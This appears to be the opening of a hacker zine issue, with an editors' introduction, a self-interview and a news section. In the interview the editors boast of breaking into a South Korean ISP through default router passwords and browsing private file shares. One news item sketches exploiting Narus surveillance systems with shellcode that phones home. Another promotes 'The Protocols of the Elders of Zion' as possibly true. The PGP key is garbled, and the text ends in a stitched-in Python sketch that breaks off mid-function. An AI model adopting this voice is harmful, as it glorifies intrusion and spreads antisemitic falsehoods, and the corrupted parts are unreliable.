Introduction


By The Circle of Lost Hackers 


"As long as there is technology, there will be hackers. As long as there 
are hackers, there will be PHRACK magazine. We look forward to the next 
20 years" 


This is how the PHRACK63 Introduction ended, telling everybody that
the Staff would change and to expect a release sometime in
2006/2007. This is that release. This is the new staff, "The Circle of
Lost Hackers". Every new management requires a presentation and we decided
to do it by Prophiling ourselves. Needless to say, we’ll stay anonymous,
mainly for security reasons that everyone understands.


Being anonymous doesn’t mean being closed at all. Phrack staff has always
evolved, and will always evolve, depending on who really cares about being
a smart-ass. The staff will always welcome new people who care about
writing cool articles, meeting new authors and helping them publish their
work in the best conditions. The guarantee of freedom of speech will be
preserved. It is the identity of our journal.


Some people were starting to say that Phrack would never be reborn. That
there would never be a PHRACK64 issue. We heard that while we were
working on it, we smiled and kept going. Some others were saying that the
spirit was lost, that everything was lost.


No, Phrack is not dead. Neither is the spirit in it. 


All the past Phrack editors have done great work, making Phrack
Magazine "the most technical, most original, the most Hacker magazine in
the world", written by the Underground for the Underground.

We are in debt to them; every single hacker, cracker or researcher
of the Underground should feel in debt to them.
For the work they did.
For the spirit they helped to spread.
For the possibility of having a real Hacker magazine.


No, nothing is or was ever lost. Things change, security becomes a 
business, some hackers sell exploits, others post for fame, but Phrack is 
here, totally free, for the community. No business, no industry, no honey, 
baby. Only FREEDOM and KNOWLEDGE. 




We know the burden of responsibility that we have and that’s why we worked
hard to bring you this release. It wasn’t an easy challenge at all: we
lost some people during those months and met new ones. We decided to
make our first issue without a "real" CFP, limiting it to the
closest people we had in the underground. A big thank you to everyone who
participated. We needed to understand who was really involved and who was
lacking time, spirit or motivation: giving each one a lot of work to do
(writing, reviewing, extending and coding) was the best way to find
out. This is not a "change of direction": the next issues will have their
official CFP and any article is (and has always been) welcome.


We know that we have a lot to learn; we’re improving from our mistakes and
from the problems we’ve been facing. We also know that this release is
not "the perfect one", but we think that the right spirit is there and so
is the endeavor. The promise to make each new release a better one is a
challenge that we want to win.


No, Phrack is not dead. And will never die.
Long live PHRACK.


- The Circle of Lost Hackers


For this issue, we’re bringing you the following:


0x01 Introduction                                          The Circle of Lost Hackers
0x02 Phrack Prophile of the new editors                    The Circle of Lost Hackers
0x03 Phrack World News                                     The Circle of Lost Hackers
0x04 A brief history of the Underground scene              The Circle of Lost Hackers
0x05 Hijacking RDS TMC traffic information signal          lcars
                                                           danbia
0x06 Attacking the Core: Kernel Exploitation Notes         twiz
                                                           sgrakkyu
0x07 The revolution will be on YouTube                     gladio
0x08 Automated vulnerability auditing in machine code      Tyler Durden
0x09 The use of set_head to defeat the wilderness          g463
0x0a Cryptanalysis of DPA-128                              sysk
0x0b Mac OS X Wars - A XNU Hope                            nemo
0x0c Hacking deeper in the system                          ankhara
0x0d The art of exploitation: Autopsy of cvsxpl            Ac1dB1tch3z
0x0e Facing the cops                                       Lance
0x0f Remote blind TCP/IP spoofing                          lkm
0x10 Hacking your brain: The projection of consciousness   keptune
0x11 International scenes                                  Various


Scene Shoutz:


All the people who helped us during the writing of this issue, especially
assad, js, mx-, krk, sysk. Thank you for your support to Phrack. The
magazine deserves a good amount of work and it is not possible without
a strong and devoted team of hackers, admins, and coders.

The circle of lost hackers is not a precise entity and people can join
and quit it, but the main goal is always to give Phrack the release
deserved by the underground hacking community. You can join us whenever
you want to present a decent work to a wider range of people. We
also need reviewers on all topics related to hardware hacking and
body/mind experience.

All the clowns who pretend to be blackhats on IRC and made a pitiful
attempt to leak Phrack on Full-Disclosure: Applause (Even the changes
in the title were so subtle, a pity you did not put any rm -fr in the
code, maybe you didn’t know how to use uudecode ?)


Enjoy the magazine!


[-] 


Nothing may be reproduced in whole or in part without the prior written
permission from the editors.
Phrack Magazine is made available to the public, as often as possible,
free of charge.


[ C O N T A C T   P H R A C K   M A G A Z I N E ]


Editors           : circle[at]phrack{dot}org
Submissions       : circle[at]phrack{dot}org
Commentary        : loopback[@]phrack{dot}org
Phrack World News : pwn[at]phrack{dot}org


Submissions may be encrypted with the following PGP key: 
(Hint: Always use the PGP key from the latest issue) 


-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.4.5 (GNU/Linux) 


mQGiBEZSCpoRBACOVU8+6+Sy9/8Csiz27Vrd0IV9cxhaaGr2xTg/U8rrfizz4ybbZ 
hfFWIv+ttdu6C+JEATIGUKzn9mVJ135EieQcC8bNJ6SXz1LOJHTDhHFSGkG1A8Q0i2k 
/yRPtljPceWWxgCxBfoc8BtvMLUbagSJ/PFzyt+tibwCGfoMxYifbbkRyS8wCgmVUV 
gBmpzy41ls5qzegAqVPOCIyEEAK7b7U jnOqvEjsSqdgHy 9fVOcxJhh1I0/tP8sAvZR 
/juUPGc1 6PtP/HPbgsyccPBZV6sOLY1liu92y7sLZH8Yn9SWI 871 Zvd3dz02KQIRC 
Z1Z+PiSK9ITITVd7ELOm8qgXALESBn jJMA40f6+OckvuGnDTHPmHRsJEnseRr21XiH 
+CmcA/9b1LrNhK4hMwM1ULB/ 3Nnue 3D jkyTTCAAFQx2efTOCUK6ESGONSILS4V1L 
3QWwnMTDsdc37sTBbhM1c6gw jD461z2G4bIWXCZZAb 6mGNHDKKLOVOSW+CN3KtMa 
MOvF qVOKM0JUnzHAHAzL2cyhUquuU 9WYOHMv/ephWeFTooadcrqbQ/VGhlLIENpcmNs 
ZSBvZiBMb3NOTEhhY2tlcnMgKHd3dy5waHJhY2sub3dUnKSA8Y21yY2x1QHBocnF 4 
ayovemctiGYEEXECACYFAkKZSCpoCGwMFCOQPCZwAGCwk I BwMCBBUCCAMEFgIDAQIe 
AQIXgAAKCRCt ZBmMRMD i 98 9eZAJ 9X0 6V6ATXZ1/k5+SG1GF5aRedM60Cg jkhZLVOP 

8 

0 


5 


aNUYru8KVtzfxd0J60om5AgQ0ERLIKrRAIAMgbTDk28 6rkgrJkCFQo9h8Pf1hSBOyT 
yU/BFdOPDKEK8+cMsMt PmSODzBGv5PSa+OWLNPxCyAEXis5sKpoFVT5mEkKFM8FCh 
Z2x7zzZPbI+bzyGMTQ4kPaxoTf2Ng/4ZE1W+iCyyTsSwt jxQkx2M410zW5rygtw2z 
lqrbUN+ikKOQ9c2+oleIxEdWiumeiw7FkypExWjo+7HCC2QnPtBVYzmw5Ed6xDS1L 
rXQt+rKj23L7/KLOWSegQ9zfrrVKISD83kiUg jyopXMBY2t PUGQUF LpsImE8f£NZ3Rm 
hYWO ibpOWUdu6K+DnAu5ZzgYhVAWKR5DQKVTGUY34+n/C2G/7C£MIhrMAAWYH/1Pw 
d1lFmROy 6ZrxEWEGHpYaHkAJP1Vi4VM82v9duYHf1n250idJhjf ITDAHTFZBDn1Bhz 
CgWCwi7 9ytMFOCIHy9Ivf£xG4 JNZVVTX2ZhOfPNullefHop3Gsq7ktAxgKJJDZ4cT 
oVHzZF4uCv7cCrn76BddGhYd7nru5 9yOGDPoV5f7xpNilcxgoQsF20IpyY79cI8co 
jJimET3B1F3Kox0tzV5utvxs 6+tdwP4ed5uGiYJNBCth4yR11CChDDDHJmXGNPJUrr 
+2Y49Hs2b3GsbCyaDaBv3 £Mn9 6t zwcXzWxRV9IQ4/pxot /W7CRpimCM4gHsrw9mZa 
+Lo+Gyk jt zVMMdUeZWal TwOYEQIADWUCRIIKrQIbDAUJA8JnAAAKCRCt ZBmRMDi 9 
80yQAJ9V7DcHjJ42YzpFRC7tPrGP721B/pgCdH jt 52h4ocdJpqs5mKKwb 6yON 4 5xM= 
=Nf2W 

-----END PGP PUBLIC KEY BLOCK-----


phrack:~# head -22 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate. When possible,
 *  all facts are checked, all code is compiled. However, we are not
 *  omniscient (hell, we don’t even get paid). It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein. Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass. We neither advocate, condone nor participate
 *  in any sort of illicit behavior. But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */
Phrack Pro-Phile


By The Circle of Lost Hackers 


Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring
info to you, the users, about old and highly important controversial
people. The first Phrack Pro-Phile was created in Phrack Issue 4 by
Taran King. Since that date, a total of 43 profiles have been produced. Some
well-known hackers were profiled, like Taran King, The Mentor,
Knight Lightning, Lex Luthor, Emmanuel Goldstein, Erik Bloodaxe,
Control-C, Mudge, Aleph-One, Route, Voyager, Horizon or, more
recently, Scut.


This prophile is probably a little different since it will introduce
the new staff. Since the people composing The Circle of Lost Hackers
want to stay anonymous, the Prophile will be more of a "question-answer"
prophile.

Personal 

Handle: The Circle of Lost Hackers 

Call them: call them what you want, just be careful 

Handle Origin: Dead Poets Society movie 


Date of Birth: from 1977 to 1984


Age at current date: haha 
Countries of origin: America, South-America and Europe 


Favorite Things 


Women : Angelina Jolie because she was a great hacker in a movie 

Cars : Like everyone, the DeLorean. The only nice car in the
world.

Foods : Italian food is without a doubt the best food. Some others
prefer Chinese, or Japanese once they have tasted yakitori.


Alcohols : anything which makes you drunk


Drugs : Sex 

Music : Drum and Bass, Sublime, Orbital, Red Hot Chili Peppers, DJ 
Shadow, The Chemical Brothers, The Mars Volta, more generally 
death metal, and gothic rock. Abstract electro bands like 
Boards of Canada. 

Movies : Blade Runner, The Usual Suspects, Fight Club, Kill Bill,
Hackers (private joke)

Authors : Gurdjieff, Rudolf Steiner, Rupert Sheldrake, Plato, Stephen
Hawking, Roger Penrose, George Orwell, Noam Chomsky,
Sun Tzu, Nikola Tesla, Douglas Hofstadter, Ernesto Guevara,
Daniel Pennac, Gabriele Romagnoli

Open Interview 


Q: Hello
A: Saluto amigo!


Q: Can you introduce yourselves in a few words?

A: The Circle of Lost Hackers is, above all, a group of friends. Two years
ago, when TESO decided to stop Phrack, the voice of the underground
decided not to let Phrack die. People started to wonder: is Phrack
really dead? In no way it is. Phrack is always reborn, thanks to the
influence of multiple hacking crews that make this possible. But at the
beginning it was not easy to create a new team: a lot of people agreed
to continue Phrack but not really to write or review articles. Also,
one of the most important things was to have people with the right
spirit. Now we think that we have a good team and we hope to bring to the
Underground scene a lot of quality papers like in the old issues of Phrack,
while keeping the technical touch that makes Phrack a unique hacking
magazine. The Phrack staff evolves and will always evolve as new
talents get interested in sharing information for fun and for free.


Q: How many people make up The Circle of Lost Hackers?

A: We could tell you, but then we would have to kill you. The only
important thing is that "The Circle of Lost Hackers" is not a
restricted club. More people will join us, others may leave, depending
on who really believes in communication, hacking and freedom of research
and information.


Q: When did you start to play with computers and to learn hacking?

A: Each one of us could answer differently. There’s no "perfect" age to
start, nor is it ever too late to start. Hacking is researching. It
is being so obstinate about solving and understanding things that you spend
nights over some code, a vulnerability, an electronic device, an idea.


Hacking is something you have inside: maybe you’ll never touch a
computer or write code, but if you have a "hacking mind" it will
reveal itself, sooner or later.


To give you an idea, the first computers of some members of the
team were a 286, a 486 SX or an Amiga 1000. Each of us started
to play with computers at the end of the 80s or the beginning of the 90s. The
hacking life of our team started more or less around 97. As for
a lot of people, Phrack and 2600 mag were and are a great source of
inspiration, as well as IRC and reading source code.


Q: This interview is quite strange, you ask the questions and give the
answers at the same time ?!?!

A: What’s the problem? In Phrack issue 20 Taran King did a prophile
of himself!!!


Q: Can you tell us what your most memorable experience is?

A: Each of us has a lot of memorable experiences but we don’t really have
a common experience where we all hacked together. So to make it easy we
are going to share three of our "memorable" experiences.


1.

A subtle modification of p0f which made me find documents
that I wasn’t supposed to find. Some years ago, I had a period when
each month I tried to focus on the security of one country. One of
those countries was South Korea, where I owned a big ISP. After
spending some time figuring out how I could leave the DMZ and enter
the LAN, I succeeded thanks to a Cisco modification (I like
default passwords). Once in the LAN and after hiding my activity
(userland > kernelland), I installed a slightly modified version of
p0f. The purpose of this version was to automatically scan all
the Windows boxes found on the network, mount shared folders and
list all files in these folders. Nothing fantastic. But one of
the computers scanned contained a lot of files about the other
Korea... North Korea. And trust me, there were files that I
wasn’t supposed to find. I couldn’t believe it. I could have played the
evil guy and tried to sell these files for money, but I had (and
I still have) a hacker ethic. So I simply added a text file on
the desktop to warn the user of the "flaw". After that I left
the network and I didn’t come back. It was more than 5 years
ago, so don’t ask me the name of the ISP: I can’t remember.


2.

Learning hacking by practice with some of the best hackers worldwide.
Sometimes you think you know something, but it’s almost always possible
to find someone who proves you wrong. Whether we talk about
hacking a very big network with many thousands of accounts and knowing
exactly how to handle this in minutes in the stealthiest manner, or
about auditing source code and finding a vulnerability in a daemon or
Operating System used by millions of people on the planet, there is
always someone out there who outsmarts you, just when you thought you were
one of the best at what you are doing. I do not want to go into detail, to
avoid compromising anyone’s integrity, but the best experiences are
those made of small groups (3, 4 ..) of hackers, working on something
in common (hacking, exploits, coding, audits ..), for example in a
screen session. Learning by seeing the others do. Teaching younger
hackers. Sharing knowledge in a very restricted personal area.
Partying in private with hackers from all around the world and getting
0day found, coded, and used in a single hacking session.


Q: Has one of you been busted in a previous life?
A: Hope not, but who knows?


Q: What do you think about the current scene? 

A: We think a lot of things. Probably the best answer is to read the
article "A brief history of the Underground scene" in this issue, where
we talk about the scene and the Underground.


Q: What’s your opinion about old phracks? 

A: Great. Old phracks were the first source of information when we were
starving for more to learn. _The_ point of reference. But don’t limit
yourselves to the last 10 issues, all issues are still interesting.


Q: And about PHC? 

A: Well, that’s an interesting question. To be honest, PHC did not only do
the bad things we used to hear about on the web or IRC; we like some
of them and even know a few others very well. Also, the two attempted
issues 62 and 63 of PHC showed an undeniable renewal of the spirit and
there was even some useful information on honeypots and protecting
exploits.


However, we have a problem with unjustified arrogance. If it’s true that
the security world has a problem with white/black hats, we think that
the right way to resolve the problem is not to fight everyone,
especially in such a poorly demonstrative way. It’s not our conception of
hacking. Take the first 20 issues of Phrack and try to find an unjustified
arrogant word/sentence/paragraph: you won’t find any. The essence of
hacking is different: it’s learning. Hacking to learn.


You can be a blackhat and work in the IT industry; it’s
not incompatible. We have nothing against PHC and we think the
Underground needs a group like PHC. But the Underground needs a magazine
like Phrack as well. The main battle of PHC is fighting whitehats, but
it’s not Phrack’s battle. It’s never been the purpose of Phrack.
If we have to fight against something, it’s against society,
not targeting whitehats personally (that doesn’t mean that we support
whitehats...). Phrack is about fighting society by releasing
information about technologies that we are not supposed to learn about. And
these technologies are not only Unix-related and/or software
vulnerabilities.


We agree with them when they say that recent issues of Phrack probably
helped the security industry too much and that there was a lack of
spirit. We’re doing our best to change it. But we still need technical
articles. If they want to change something in the Underground, they are
welcome to contribute to Phrack. Like everyone in the Underground
community.


Q: Full-disclosure or non-disclosure? 

A: Semi-disclosure. For us, obviously. Free exchange of techniques, ideas
and code, but no ready-to-use exploits, nor ready-to-patch
vulnerabilities.


Keep your bugs for yourself and for your friends, and do your best not to
let them leak. If you’re cool enough, you’ll find many and you’ll be
able to patch your boxes.


Disclosing techniques, ideas and code implementations helps other
Hackers in their work; disclosing bugs or releasing "0-day" exploits
helps only the Security Industry and the script kiddies.
And we don’t want that.


You might be an Admin, you might be thinking: "oh, but my box is not
safe if I don’t know about vulnerabilities". That’s true, but remember
that if only very skilled hackers have a bug you won’t have to face a
"rm -rf" of the box or a web defacement. That’s a kiddies’ game, not
a Hackers’ one.


But that’s our opinion. You might have a totally different one and we
will respect it. You might even want to release a totally unknown bug
on Phrack’s pages and, if you write a good article, we’ll help you in
publishing it. Maybe discussing the idea, before.


As we said in the introduction, the first thing we want to guarantee
is freedom of speech. That’s the identity of our journal.


Q: What’s the best advice that you can give to the new generation of hackers?

A: First of all, enjoy hacking. Don’t do it for fame or to earn more
money, nor to impress girls (hint: it doesn’t always work ;)) or only to
be published somewhere. Hack for yourself, hack for your interest, hack
to learn.


Second, be careful. In everything you do, in any relationship you’ll
have. Respect people and try not to disrupt their work only because
you’re distracted or angry.


Third, have fun. Have a lot of fun. 


And never, never, never set up a honeypot (hi Lance!).


Q: What do you think about starting an Underground World Revolution 
Movement against the establishment ? 

A: Do it. But do it Underground. Today’s world is too obsessed with
"Visibility". Act, let the others talk.


Q: What’s the future of hacking ? 

A: The future is similar to the present and to the past. "Hacking" is the
resulting mix of curiosity and research for information, fun and
freedom. Things change, security evolves and so does technology, but the
"hacker-mind" is always the same. There will always be hackers, that is,
skilled people who want to understand how things really work.


To be more concrete, we think that the near future will see way more
interest in hardware and embedded systems hacking: hardware chip
modification to circumvent hardware-based restrictions, mobile and
mobile services exploits/attacks, etc.


Moreover, it seems like more people are hacking for money (or, at least,
that’s more "publicly" known), selling exploits or backdoors. Money is
usually the source of many evils. It is indeed a good motivating factor
(moreover hacking requires time, and having that time paid when you
don’t have any other work is really helpful), but money brings with
itself the business mind. People who pay hackers aren’t interested in
research, they are interested in business. They don’t want to pay for
months of research that lead to a complex and eleet technique, they want
a simple php bug to break into other companies’ websites and change the
homepage. They want visible impact, not evolved culture.


We’re not for the "hacking-business" idea, you probably realized that.
We’re not for exploit disclosure either, unless the bug has already been
known for some time and showing the exploit code would help to better
understand the coding techniques involved. And we don’t want someone with
a lot of money (read: governments and big companies) to be able one day to
"pay" (and thus "buy") all the hackers around.


But we’re sure that that will never happen, thanks to the underground, 
thanks to people like you who read phrack, learn, create and hack 
independently. 


Q: Do you have some people or groups to mention?
(mention some people and say what you think about them, PHC, etc)


A: There are groups and people who have driven (or are driving) the
evolution of the scene. We try to tell a bit of their story in the
"International Scenes" phile (starting in this issue with: Quebec,
Brazil and France). Each country has its story: Italy has s0ftpj
and antifork, Germany has TESO, THC and Phenoelit (thanks for your great
ph-neutral party), Russia, France, Netherlands, or Belgium have ADM,
Synnergy, or Devhell, USA and other countries have PHC...


Each one will have its space in "International Scenes". If you’re part
of it, if you want to tell the "real story", just submit us a text. If
you are too paranoid to submit a tfile to Phrack, it’s ok. If you wish
to contribute to the underground information, our journal is your
journal as well and we can find a solution that keeps you anonymous.


Q: Thank you for this interview, I hope readers will enjoy it!
A: No problem, you’re welcome. Can I have a beer now?
Phrack World News


compiled by The Circle of Lost Hackers


The Circle of Lost Hackers is looking for any kind of news related to
security, hacking, conference reports, philosophy, psychology, surrealism,
new technologies, space war, spying systems, information warfare, secret
societies, ... anything interesting! It could be a simple news item with
just a URL, a short text or a long text. Feel free to send us your news.


Again, we need your help for this section. We can’t know everything,
we try to do our best, but we need you ... the scene needs you...
humanity needs you...even your girlfriend needs you, but you should already
know this... :-)


1. Speedy Gonzales news
2. One more outrage to the freedom of expression
3. How we could defeat the Orwellian Narus system
4. Feeling safer in a spying world
5. D-Wave computing demonstrates a quantum computer


Speedy News-[ There is no age to start hacking ]--


http://www.dailyecho.co.uk/news/latest/display.var. 
1280820.0.how_girl_6_hacked_into_mps_commons_computer.php 


Speedy News-[ Eeye hacked ? ]--


Speedy News-[ Anarchist Cookbook ]--
The anarchist cookbook version 2006, be careful... 


http://www.beyondweird.com/cookbook.html 


Speedy News-[ Is Hezbollah better than Israeli militants? ]-- 


http://www.fcw.com/article96532-10-19-06-Web 


Speedy News-[ How to be secure like an 31337 DoD dude ]-- 


https://addons.mozilla.org/en-US/firefox/addon/3182 


Speedy News-[ Hi I’m Skyper, ex-Phrack and I like Phrack’s design! ]-- 


http://conf.vnsecurity.net/cfp2007.txt 


Speedy News-[ The most obscure company in the world ]-- 


http://www.vanityfair.com/politics/features/2007/03/spyagency200703?
printable=true&currentPage=all


A "MUST READ" article... 


Speedy News-[ Terrorism excuse Vs freedom of information ]-- 


http://www.usatoday.com/news/washington/2007-03-13-archives_N.htm 


Speedy News-[ Zero Day can happen to anyone ]-- 


http://www.youtube.com/watch?v=L7409RQbkUA


Speedy News-[ NSA, contractors and the success of failure ]-- 


http://www.govexec.com/dailyfed/0407/040407mm.htm


Speedy News-[ Blood, Bullets, Bombs, and Bandwidth ]--


http://rezendi.com/travels/bbbb.html 


Speedy News-[ The day when the BBC predicted the future ]--


http://www.prisonplanet.com/articles/february2007/260207building7.htm 
Spirit News-[ Just because we like these websites ]--


http://www.cryptome.org/ 
http://www.2600.com/ 


--[ 2. One more outrage to the freedom of expression 
by Napoleon Bonaparte 


The distribution of a book containing a copy of the Protocols of 
the Elders of Zion was stopped in Belgium and France by Israeli 
lobbyists. 


The authors advance that the bombing of the WTC could be in relation with 
Israel. It’s not the good place to argue about this statement, but what 
is interesting is that 6 years after 11/09/01 we read probably more than 
100 theories about the possible authors of WIC bombing: Al Qaeda, Saoudi 
Arabia, Irak (!) or even Americans themselves. But this book advances the 
theory that _maybe_ there is something with Israel and the diffusion is 
forbidden, just one month after its release. 


Before releasing this book, the Belgian association antisemitisme.be 
read it to give his opinion. The result is apparent: the book is not 
antisemitic. The only two things that could be antisemitic in this book 
are: 


- the diffusion of "The Protocols of the Elders of Zion" in the annexe 
of the book. If you take a look on Amazon, you can find more than 
30 books containing The Protocols. 


— the cover of the book which show the US and Israeli flags linked with a 
bundle of dollars. 


Actually you can find the same kind of picture on the website of the 
Americo-Israeli company Zionoil: http://www.zionoil.com/ . And the 

cover of the book was designed before the author found the same picture on 
Zionoil’s website. 


Also, something unsettling in this story is that the book was removed 
on the insistence of a Belgian politician: Claude Marinower. And on the 
website of this politician, we can see him with Moshe Katsav who is the 
president of Israel and recently accused by Attorney General Meni Mazuz 
for having committed rape and other crimes... 


http://www.claudemarinower.be/uploads/ICJP-israelpresi.JPG


So why the distribution of this book was banned? Because the diffusion of 
"The Protocols of the Elders of Zion" is dangerous? Maybe but... 


You can find on Internet or amazon some books like "The Anarchist 
Cookbook" which is really more "dangerous" than the "The Protocols of 

the Elders of Zion". In this book you can find some information like how 
to kill someone or how to make a bomb. If we have to give to our children 
either "The Anarchist Cookbook" or "The Protocols of the Elders of Zion", 
I’m sure that 100% of the population will prefer to give "The Protocols 
of the Elders of Zion". Simply because it’s not dangerous. 


So why? Probably because there are some truth in this book. 


The revelations in this book are not only about 11/09/2001 but also about 
the Brabant massacres in Belgium from 1982 to 1985. The authors advances 
that these massacres were linked to the GLADIO/stay-behind network. 


As Napoleon Bonaparte said: "History is a set of lies agreed upon". 
He was right...


[1] 
http://www.antisemitisme.be/site/event_detail.asp?language=FR&eventid
=473&catId=26


[2] http://www.ejpress.org/article/14608 


[3] 
http://www.wiesenthal.com/site/apps/nl/content2.asp?c=fwLYKnN8LzH&b 
=245494&ct=2439597 


[4] 
http://www.osservatorioantisemitismo.it/scheda_evento.asp?number=1067& 
idmacro=2&n_macro=3&idtipo=59 


[5] http://ro.novopress.info/?p=2278 


[6] http://www.biblebelievers.org.au/przionl.htm 


--[ 3. How we could defeat the Orwellian Narus system 
by Napoleon Bonaparte 


AT&T, Verizon, VeriSign, Amdocs, Cisco, BellSouth, Top Layer Networks,
Narus, ... all these companies are inter-connected in our wonderful
Orwellian world. And I’m not even talking about companies like Raytheon
or others involved in "ECHELON".


That’s not new: our governments spy on us. They eavesdrop on our phone
conversations, our Internet communications, they take beautiful
photos of us with their imagery satellites, they can even see through
walls using reconnaissance satellites (Lacrosse/Onyx?), they install
cameras everywhere in our cities (how many cameras in London???),
RFID tags are more and more present, and with upcoming technologies like
nanotechnologies, bio-informatics or smartdust systems there is really
something to worry about.


With all these systems already installed, it’s utopian to think that
we could come back to a world without any spying system. So what can
we do? Probably not a lot. But I would like to propose a
funny idea about NARUS, the system allowing governments to eavesdrop on
citizens’ Internet communications.


This short article is not an introduction to Narus. I will just give
you a short description of its capabilities. A longer article
could be written in a future release of Phrack (any volunteers?). So
Narus is an American company founded in 97. The first work of Narus
was to analyze IP network traffic for billing purposes. In order to
accomplish this they strongly contributed to the standardization
of the IPDR Streaming Protocol by releasing an API Code [1] (study this
doc, it’s a key to break NARUS). Nowadays, Narus is also part of
what I will call the "spying business". According to its authors,
the system can collect data from links, routers, soft switches, IDS/IPS,
databases, ..., normalize, correlate, aggregate and analyze all these
data to provide a comprehensive and detailed model of user, element,
protocol, application and network behaviors. And most importantly:
everything is done in real time. So all your e-mails, instant messages,
video streams, P2P traffic, HTTP traffic or VOIP can be monitored. And
it doesn’t care about which transmission technology you use: optical
transmission can also be monitored. This system is simply amazing and
we should send our congratulations to its designers. But we should
also send our fears...
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If we want to block Narus, there is an obvious way: using 

cryptography. Nowadays, it’s quite easy to send an encrypted email. You 
don’t even have to worry about your email client, everything it’s 
transparent (once configured). The problem is that you need to give 
your public key to your interlocutor, which is not really "user 
friendly". Especially if the purpose is simply to send an email to 

your girlfriend. But it’s still the best solution to block a system 
like Narus. Another way to block Narus is to use steganography, but 
it’s more complicate to implement. 


In conclusion, there is no way to totally stop a system like Narus, and
the only good way to block it is to use cryptography. But we hackers
can do something against Narus. Something funny. The idea is the
following: we should know where a Narus system is installed!


First step. An organization, a country or simply someone should buy
a Narus system and reverse it. There are a lot of tools to reverse a
system, free or commercial. Since the purpose of Narus is to analyze
data, its main task is parsing data. And we know that systems parsing
data are the most sensitive to bugs. So a first idea could be to fuzz
it with random requests and, if that doesn’t work, to do some reversing.
Once a bug is detected (and for sure, there IS at least one bug), the
next step is to exploit it. A difficult task, but not impossible. The
most interesting part is the next one: the shellcode.


There are two possibilities: either the system where Narus is installed
has an outgoing Internet connection or it doesn’t. If not, the shellcode
will be quite limited; the "best" idea is maybe just to destroy the
system, but that’s not useful. The useful case is when Narus is installed
on a system with an outgoing Internet connection. We don’t want a shell
or something like that on the system; what we want is to know where a
Narus system is installed. So all our shellcode has to do is send a
ping or a special packet to a server on the Internet to say "hello, a
Narus is installed at this place". We could keep a database of all the
Narus systems we discover in the world.


This idea is probably not very difficult to implement. The only bad
thing is that if we release the vulnerability, it won’t take long for
Narus to patch it.


But after all, what else can we do? 
Again, as Napoleon said: "Victory belongs to the most persevering". 


And hackers are... 


[1] http://www.ipdr.org/public/DocumentMap/SP2.2.pdf 


--[ 4. Feeling safer in a spying world 
by Julius Caesar 


At first, it’s subtle. It just sneaks up on you. The only ones who 
notice are the paranoid tinfoil hat nutjobs, the ones screaming about
conspiracies and big brother. They take a coincidence here and a fact 
from over there and come up with 42. It’s all about 42. 


We need cameras at ATM machines, to catch robbers and muggers. Sometimes 
they even catch a shot of the Ryder truck driving by in the background. 
People get mugged in elevators, so we need some cameras there too. 
Traffic can be backed up for a while before the authorities notice, so 
let’s have some cameras on the highway. Resolution gets better, and we 
can catch more child molesters and terrorists if they can record license
plates and faces. 


Cameras at intersections catch people running red lights and
speeding. We’re getting safer every day. Some neighborhoods need
cameras to catch the hoods shooting each other. Others need cameras
to keep the sidewalks safe for shoppers. It’s all about safety.


Then one day, the former head of the KGIA is in charge, or arranges 
for his dimwitted son to fuck up yet again as president of something. 


Soon, we’re at war. Not with anyone in particular. Just Them. You’re 
either with us, or you’re with Them, and we’re gonna git Them.


Our phone calls need to be monitored, to make sure we’re not one
of Them. Our web browsing and shopping and banking and reading and
writing and travel and credit all need to be monitored, so we can catch
Them. We’ll need to be searched when travelling or visiting a government
building because we might have pointy metal things or guns on us. We
don’t want to be like Them.


It’s important to be safe, but how can we tell if we’re safe or not? What 
if we wander into a place with no cameras? How would we know? What if
our web browsing isn’t being monitored? How can we make sure we’re safe? 


Fortunately, there are ways. 


Cameras see through a lens, and lenses have specific shapes with unique
characteristics. If we’re in the viewing area of a camera, then we
are perpendicular to a part of the surface of the lens, which usually
has reflective properties. This allows us to know when we’re safely in
view of a camera.


All it takes is a few organic LEDs and a power supply (like a 9V 
battery). Arrange the LEDs in a circle about 35mm in diameter, and wire 
them appropriately for the power supply. Cut a hole in the center of 
the circle formed by the LEDs. 


Now look through the hole as you pan around the room. When you’re 
pointing at a lens, the portion of the curved surface of the lens which 
is perpendicular to you will reflect the light of the LEDs directly 
back at you. You’ll notice a small bright white pinpoint. Blink the 
LEDs on and off to make sure it’s reflecting your LEDs, and know that 
you are now safer. 


Worried that your Internet connection may not be properly monitored 
for activity that would identify you as one of Them? There are ways to 
confirm this too. 


Older equipment, such as Carnivore or DCS1000, could often be detected
with traceroute: it would show up as odd hops on your route to the
net. As recently as 2006, AT&T’s efforts to keep us safe showed up with
traceroute. But the forces of Them have prevailed, and our protectors 
were forced to stop watching our net traffic. Almost. We can no longer 
feel safe when seeing that odd hop, because it doesn’t show up on 
traceroute anymore. 


It will, however, show up with ping -R, which requests every machine 
to add its IP to the ping packet as it travels the network. 
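To make the mechanism concrete: ping -R sets the IPv4 Record Route
option (option type 7 in RFC 791). The option carries a length byte, a
pointer byte and up to nine 4-byte slots; each router that honors it
writes its address at the pointer and moves the pointer forward by 4.
With one byte of padding this adds 40 bytes to the IP header, which is
why ping reports 56(124) bytes instead of the usual 56(84). The Python
sketch below only simulates that bookkeeping in memory and sends
nothing on the wire. The function names are made up for this
illustration, and the two sample addresses are simply taken from the
ping output shown further down.

```python
import socket
import struct

IPOPT_RR = 7  # Record Route option type (RFC 791)


def build_empty_rr(slots=9):
    """Build an empty Record Route option with room for `slots` addresses."""
    if not 1 <= slots <= 9:
        raise ValueError("Record Route can hold between 1 and 9 addresses")
    length = 3 + 4 * slots      # type + length + pointer, then 4 bytes per slot
    pointer = 4                 # 1-based offset of the first free slot
    return struct.pack("!BBB", IPOPT_RR, length, pointer) + bytes(4 * slots)


def record_hop(option, address):
    """Simulate a router: store its address at the pointer, then advance it."""
    opt = bytearray(option)
    length, pointer = opt[1], opt[2]
    if pointer > length:        # every slot is used: forward unchanged
        return bytes(opt)
    opt[pointer - 1:pointer + 3] = socket.inet_aton(address)
    opt[2] = pointer + 4
    return bytes(opt)


def parse_rr(option):
    """Return the addresses recorded so far, in the order they were added."""
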